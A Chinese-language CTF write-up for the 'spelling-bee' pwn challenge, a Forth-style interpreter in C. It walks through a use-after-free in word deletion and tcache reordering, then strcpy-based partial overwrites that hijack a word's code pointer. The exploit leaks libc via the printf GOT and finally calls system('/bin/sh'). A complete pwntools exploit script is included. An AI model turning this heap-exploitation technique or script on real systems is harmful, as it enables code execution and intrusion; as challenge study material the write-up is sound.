spelling-bee
这题的逻辑是这样的
首先有词典dict,词典是一个链表,每个节点存着名字和word结构体,word里面最重要的是code和param,也就程序是根据word来执行函数的(执行code(param))
word是进行操作的基本单位
typedef struct word {
long flags;
long length;
long referenced_by;
void (*code)(void *);
void *param;
} word_t;
typedef struct dictionary {
char *name;
word_t *word;
struct dictionary *next;
bool alloc_name;
} dict_t;
我们直接看main函数
int main(int argc, char **argv) {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
char token[TOKEN_SIZE];
char *compile_name = NULL;
word_t **compile_def = NULL;
int compile_word_count = 0;
int compile_word_capacity = 0;
int words_created = 0;
int constants_created = 0;
bool compiling = false;
word_t *word_end = make_primitive(_forth_end, 0);
dict_t *dict = NULL;
add_primitive(&dict, ":", _col, WF_IMM);
add_primitive(&dict, ";", _semicolon, WF_IMM);
add_primitive(&dict, "forget", _forget, WF_IMM);
add_primitive(&dict, "drop", _drop, 0);
add_primitive(&dict, "+", _add, 0);
add_primitive(&dict, "dup", _dup, 0);
add_primitive(&dict, "2dup", _2dup, 0);
add_primitive(&dict, "?dup", _qdup, 0);
add_primitive(&dict, "over", _over, 0);
add_primitive(&dict, "2over", _2over, 0);
add_primitive(&dict, "rot", _rot, 0);
add_primitive(&dict, "swap", _swap, 0);
add_primitive(&dict, "2swap", _2swap, 0);
add_primitive(&dict, ".", _dot, 0);
add_primitive(&dict, ".s", _sdot, 0);
printf("I heard computers like stacks, so I went forth and made a few\n"
"It's lacking a few words, maybe you could implement them for me?\n"
"%p\n",
dosys);
while (true) {
if (g_flags & FF_COMPILE) {
if (compiling) {
fprintf(stderr, "already compiling\n");
exit(-1);
}
g_flags &= ~FF_COMPILE;
if (words_created >= MAX_WORDS) {
fprintf(stderr, "too many words\n");
exit(-1);
}
expect_token(token);
compile_name = malloc(strlen(token) + 1);
assert(compile_name);
strcpy(compile_name, token);
compile_word_capacity = 16;
compile_word_count = 0;
compile_def = malloc(sizeof(word_t *) * compile_word_capacity);
assert(compile_def);
compiling = true;
}
if (g_flags & FF_STOP_COMPILE) {
if (!compiling) {
panic("already not compiling\n");
}
g_flags &= ~FF_STOP_COMPILE;
compiling = false;
words_created++;
push_word(&compile_def, word_end, &compile_word_count,
&compile_word_capacity);
word_t *nw = make_primitive((void (*)(void *))docol, WF_MALLOC_PARAM);
nw->param = compile_def;
nw->length = compile_word_count;
add_word(&dict, compile_name, nw, true);
printf("defined a new word %s\n", compile_name);
}
if (g_flags & FF_FORGET) {
g_flags &= ~FF_FORGET;
expect_token(token);
if (delete_word(&dict, token)) {
printf("forgot word %s\n", token);
} else {
printf("word not found\n");
}
}
expect_token(token);
word_t *word = find_word(dict, token);
int number = 0;
if (word == NULL) {
number = accept_integer(token);
if (number < 0) {
panic("you spelled a word incorrectly :(\n");
}
}
if (compiling) {
if (!word) {
if (constants_created >= MAX_CONSTANTS) {
panic("too many constants\n");
}
constants_created += 1;
word = make_primitive((void (*)(void *))docon, WF_MALLOC_PARAM);
cell *n = malloc(sizeof(cell));
assert(n);
*n = number;
word->param = n;
}
if (word->flags & WF_IMM) {
RESETR;
word->code(word->param);
} else {
word->referenced_by += 1;
push_word(&compile_def, word, &compile_word_count,
&compile_word_capacity);
}
} else {
RESETR;
if (word) {
word->code(word->param);
} else {
PUSH(number);
}
}
}
return 0;
}
main函数直接给我们pie地址,然后在开始时在dict里面创建了一些初始word,是为了执行基本函数的
在初始时g_flags被设置为全0,会跳过while前面两个if的判断,会到 expect_token(token);,这里是用fscanf接收的,所以会以空格换行符等作为结尾,也就是假设我们输入1 2 3,这里只会接收1,然后判断是数字还是word,如果是数字直接压入栈中,如果是word就执行这个word对应的word(param)
这里模式是通过“:”word进入的,停止编译是“;”word,这是main函数开头初始化的word操作
我们先看编译模式
以输入:a ;操作为例
首先执行到 expect_token(token);接收“:”word
我们执行了“:”word操作后循环就进入了 if (g_flags & FF_COMPILE)
然后执行到 expect_token(token);接收"a"
然后根据这个token申请chunk存放compile_name,然后初始化compile的容量为16个word,然后申请一个chunk为compile_def空间,compile_def是存word的空间
然后然后执行到 expect_token(token);接收";“word
进入 if (compiling)执行”;“word操作把g_flags设置为停止编译状态
然后进行循环,进入 if (g_flags & FF_STOP_COMPILE)
会执行push_word
push_word(&compile_def, word_end, &compile_word_count,
&compile_word_capacity);
void push_word(word_t ***list, word_t *word, int *used, int *capacity) {
if ((*used) >= (*capacity)) {
(*capacity) *= 2;
if ((*capacity) > MAX_WORD_SIZE) {
fprintf(stderr, "fat word\n");
exit(-1);
}
*list = realloc(*list, sizeof(word_t *) * (*capacity));
assert(*list);
}
(*list)[(*used)] = word;
*used += 1;
}
传入我们创建的compile空间(compile_def),word_end这个默认创建的word,compile里面word的数量以及里面的word容量
然后会把word_end放入conpile_def[0]
然后执行 word_t *nw = make_primitive((void (*)(void *))docol, WF_MALLOC_PARAM);
word_t *make_primitive(void (*code)(void *), int flags) {
word_t *w = new_word(flags);
w->code = code;
w->param = NULL;
return w;
}
申请一个新word(后面叫做主word吧),主word的操作是docol函数
void docol(word_t **words) {
PUSHR(words);
NEXT;
}
也就是把参数word操作压入栈
然后把我们前面的compile_def(也就是存放很多个word)作为主word的param(也就是参数),compile_def里面的word数量作为length
然后 add_word(&dict, compile_name, nw, true);
void add_word(dict_t **d, char *name, word_t *word, bool alloc_name) {
dict_t *ent = malloc(sizeof(dict_t));
assert(ent);
ent->name = name;
ent->word = word;
ent->next = *d;
ent->alloc_name = alloc_name;
*d = ent;
}
这个是在字典dict里创建一个节点,这个节点存入我们的主word
也就是我们最终在字典dict里面加入了一个节点a,这个节点a的主word的操作是docol(compile_def[0](也就是word_end))
假设我们给不仅仅是创建一个默认a,而是给它加别的word操作呢
这里以”: b a ;“为例
这里a代表一个word操作
读取”:“和”b“还是跟前面一样
到了
expect_token(token);
word_t *word = find_word(dict, token);
读取”a“,找到了这个word操作,然后现在又是编译状态,我们就会进入 if (compiling)中的
if (word->flags & WF_IMM) {
RESETR;
word->code(word->param);
} else {
word->referenced_by += 1;
push_word(&compile_def, word, &compile_word_count,
&compile_word_capacity);
}
这里假设a的word操作不是立即执行(WF_IMM),会执行push_word,把a这个word操作放入compile_def[0]
这样等读取完”;“后,
我们在字典dict里面增加了一个b的节点,它的主word的操作docol(compile_def),其中compile_def[0]是a,compile_def[1]是word_end
我们再看forget操作
if (g_flags & FF_FORGET) {
g_flags &= ~FF_FORGET;
expect_token(token);
if (delete_word(&dict, token)) {
printf("forgot word %s\n", token);
} else {
printf("word not found\n");
}
}
我们输入"forget a"后读取到forget这个token就会进入这个分支
然后接收”a“,调用delete_word,传入字典和a
bool delete_word(dict_t **dict, char *name) {
dict_t **pp = dict;
dict_t *cur = *dict;
while (cur) {
if (strcmp(name, cur->name) == 0) {
word_t *w = cur->word;
if (w->flags & WF_MALLOC_PARAM) {
free(w->param);
}
free(w);
if (cur->alloc_name) {
free(cur->name);
}
*pp = cur->next;
free(cur);
return true;
}
pp = &(cur->next);
cur = cur->next;
}
return false;
}
cur是每个节点,会free每个节点的主word的compile_def的chunk和主word的chunk和节点的name的chunk和节点本身的chunk,也就是:
- a->param,也就是 compile_def_a
- word_a
- name_a
- dict_a
这里我们就能发现漏洞了
假设我们先”:a ;“,然后": b a ;",然后再"forget a"
这时的word_a已经被free了,但是dict_b->word->param[0]=compile[0]=word_a(注意是word_a不是dict_a)(param[1]是word_end),也就是dict_b里还存着word_a的地址,那我们执行word_b也就是执行docal(word_a和wod_end)
那我们只要forget a后再把word_a的那个chunk申请出来写入我们想要的内容,我们就可以利用word_b来执行我们想要的操作了
我们的目标是把word_a的code部分和param伪造成我们的目标,这样我们输入”b“指令时,就会找到b节点,找到b主word,执行docol(word_a),就会执行word_a->code(word_a->param),exp里伪造word_a的函数是:
def edit_free_chunk(code,paramam):
add(fill(49))
forget(fill(49))
payload = flat([
fill(32),
p64(paramam)[:6]
])
add(payload)
forget(payload)
add(fill(49))
forget(fill(49))
payload1 = flat([
fill(31)
])
add(payload1)
forget(payload1)
add(fill(49))
forget(fill(49))
payload2 = flat([
fill(24),
p64(code)[:6]
])
add(payload2)
forget(payload2)
我们知道word结构体是40字节,也就是0x28,malloc出来的是0x30
compile_name = malloc(strlen(token) + 1);
assert(compile_name);
strcpy(compile_name, token);
我们在申请word名的时候输入payload(能申请0x30chunk的长度),这样compile_name就是复用的word_a的地址,我们输入的payload就通过strcpy(compile_name, token);写入了word_a了
例如我们payload这样写
payload = flat([
fill(24),
p64(code)
p64(paramam)
])
然后“:payload ;”就能把word_a的code和param部分写成我们想要的了
但是这里又一个问题,就是dict_a的大小是32字节(25字节加填充的7字节),malloc出来的chunk也是0x30
而我们delete的时候是先free(word_a)然后free(dict_a)
也就是此时0x30的tcache是
tcache top --> dict_a --> word_a -->......
那我们先申请的0x30chunk拿到的是dict_a的地址
为了解决这个问题,我们采取了这个方法:
add(fill(49))
forget(fill(49))
我们先申请一个长度不为0x30的name chunk,然后它会先申请一个默认word(我们叫做wort_t),这时word_t的地址是dict_a的地址,然后会申请dict_t,这时dict_t的地址是word_a
然后我们再删除这个word
此时free(word_t)然后free(dict_t)
那现在0x30的tcache就是
tcache top --> word_a --> dict_a -->......
我们再申请0x30的chunk就是word_a的地址了
那按道理来说我们此时直接
payload = flat([
fill(24),
p64(code)
p64(paramam)
])
add(payload)
就行了啊,但是这里要注意我们是通过 strcpy(compile_name, token);写入payload的,而strcpy遇到\x00会截断,而我们8字节地址的高2字节都是\x00,所以我们分三次写入
第一次:
payload = flat([
fill(32),
p64(paramam)[:6]
])
小端序,我们覆盖param的低六字节就行了,高两字节就继续保持\x00,
第二次:
payload1 = flat([
fill(31)
])
利用strcpy会在结尾补\x00的特性把code的最高一字节覆盖成0
第三次:
payload2 = flat([
fill(24),
p64(code)[:6]
])
我们覆盖code的低六字节,顺便把高第二字节也覆盖成0
我们首先泄露libc地址,我们执行docon(elf.got["printf"])把libc地址的指针压入数据栈(这题中的g_stack是数据栈,g_ret是指令栈):
static inline void stack_push(cell value) {
if (g_sp >= STACK_SIZE - 1) {
panic("data stack overflow");
}
g_stack[++g_sp] = value;
}
#define PUSHR(w) (rstack_push((w)))
void docol(word_t **words) {
PUSHR(words);
NEXT;
}
然后用"."word操作弹出数据栈的栈顶值并查看:
static inline cell stack_pop(void) {
if (g_sp <= 0) {
panic("data stack underflow");
}
return g_stack[g_sp--];
}
void _dot(void *_) {
printf("%ld ", POP);
NEXT;
}
这样我们就泄露了libc地址,我们就能找到/bin/sh字符串地址
然后再伪造word_a执行dosys("/bin/sh")就行了
void dosys(char *val) {
system(val);
NEXT;
}
EXP:
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
target = 'ncat --ssl spelling-bee.opus4-7.b01le.rs 8443'
file_name = './chall'
ld_name = './ld-linux-x86-64.so.2'
libc_name = './libc.so.6'
args = [ld_name, "--library-path", ".", file_name]
elf = ELF(file_name)
context.binary = elf
libc = ELF(libc_name)
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
error = 1 if ('error' in sys.argv) else 0
if debug:
context(log_level='debug')
if error:
context(log_level='error')
bps = [
# 0x1234,
# 'main',
# (0xe3b31, 'libc'),
# ('system', 'libc')
]
gdb_cmd = ''
if gdb_ and switch == 0:
gdb_cmd += "set breakpoint pending on\n"
for b in bps:
if isinstance(b, int):
gdb_cmd += f"b *$rebase({hex(b)})\n"
elif isinstance(b, str):
gdb_cmd += f"b {b}\n"
elif isinstance(b, tuple) and len(b) == 2 and b[1] == 'libc':
if 'libc' in locals() and libc:
target = libc.sym[b[0]] if isinstance(b[0], str) else b[0]
gdb_cmd += f'b *($base("libc") + {hex(target)})\n'
else:
log.warning("未加载 Libc,跳过 Libc 断点")
gdb_cmd += "c\n"
if switch:
parts = target.replace(':', ' ').split()
host = parts[-2]
port = int(parts[-1])
use_ssl = '--ssl' in parts
p = remote(host, port, ssl=use_ssl, sni=host if use_ssl else None)
elif gdb_:
p = gdb.debug(args, gdbscript=gdb_cmd, aslr=True)
else:
p = process(args)
def s(data): return p.send(data)
def sa(delim, data): return p.sendafter(delim, data)
def sl(data): return p.sendline(data)
def sla(delim, data): return p.sendlineafter(delim, data)
def r(numb=4096): return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
def rl(bool): return p.recvline(keepends=bool)
def ra(t=None): return p.recvall(timeout=t)
def rn(numb): return p.recvn(numb)
def cl(): return p.close()
def it(): return p.interactive()
def uc64(data): return u64(data.rjust(8, b'\x00'))
def uu64(data): return u64(data.ljust(8, b'\x00'))
def a(f, off=libc): return lg(hex(off), (ret := f.address + off)) or ret
def cb(data): return data if isinstance(data, bytes) else str(data).encode()
def lg(name, data): return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
def bl(address): return (address).to_bytes(3, 'big')
def bt(*values): return bytes([v & 0xff for v in values])
def base(val, binary=elf): return binary.address + val
def ntlbc(leak, offset, name='Libc'): return setattr(libc, 'address', leak - (libc.sym[offset] if isinstance(offset, str) else offset)) or lg(name, libc.address)
def ntpie(leak, offset, name='PIE'): return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
def fill(num, content=b'A'): return (content.encode() if isinstance(content, str) else content) * num
def se(s, f=None): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next((f or libc).search(s if isinstance(s, bytes) else s.encode())))) or addr
def shn(target, current_printed): return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed): return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]
_rop_cache = {}
def gg(s, f=None):
target = f or libc
if target not in _rop_cache:
_rop_cache[target] = ROP(target)
rop = _rop_cache[target]
instrs = [x.strip() for x in s.split(';')]
gadget = rop.find_gadget(instrs)
if gadget:
addr = gadget.address
lg(s, addr)
return addr
else:
raise ValueError(f"[-] Critical: Gadget not found: {s}")
def ga(delim=b'|', name='Leak', data=None):
target_data = p.recv(data) if isinstance(data, int) else (data if data else ru(delim))
if isinstance(target_data, str):
target_data = target_data.encode()
hex_list = re.findall(b'0x[0-9a-fA-F]+', target_data)
return [lg(f'{name}[{i}]', x) or x for i, x in enumerate([int(a, 16)for a in hex_list])]
#################################################################################
def add(word, compile_def = b""):
sl(b": " + word + b" " + compile_def + b" ;")
ru(b"defined a new word " + word + b"\n")
def forget(word):
sl(b"forget " + word)
ru(b"forgot word " + word + b"\n")
def edit_free_chunk(code,paramam):
add(fill(49))
forget(fill(49))
payload = flat([
fill(32),
p64(paramam)[:6]
])
add(payload)
forget(payload)
add(fill(49))
forget(fill(49))
payload1 = flat([
fill(31)
])
add(payload1)
forget(payload1)
add(fill(49))
forget(fill(49))
payload2 = flat([
fill(24),
p64(code)[:6]
])
add(payload2)
forget(payload2)
ru(b"them for me?\n")
leak = ga(data=20)[0]
ntpie(leak, 0x146b)
add(b'a')
add(b'b', b'a')
forget(b'a')
edit_free_chunk(elf.sym['docon'], elf.got['printf'])
sl("b ")
sl(". ")
libc_leak = int(r(0x10))
ntlbc(libc_leak, 0x525b0)
sh = se(b"/bin/sh\x00")
edit_free_chunk(elf.sym['dosys'], sh)
sl("b ")
it()
题目链接:待更新